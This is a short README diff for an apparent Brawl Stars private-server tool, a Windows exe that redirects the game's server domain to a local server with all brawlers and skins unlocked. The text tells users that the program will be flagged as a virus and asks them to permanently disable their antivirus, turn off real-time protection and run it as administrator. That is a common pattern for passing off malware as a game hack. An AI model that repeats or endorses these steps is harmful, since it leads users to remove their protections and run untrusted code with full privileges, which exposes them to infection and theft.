codelabsaus/Nulls-Brawl-Stars/README.md

 As soon as you run this exe, the IP Address domain of Brawl Stars will be altered on your network to a local brawl stars server with all brawlers and skins, emotes and sprays maxed out.

 This will get detected as a virus, so permanently disable your antivirus before continuing with your download.
+This program only works on windows.

+Before continuing, disable real-time protection on you windows device, and run the application as an administrator.

 Enjoy!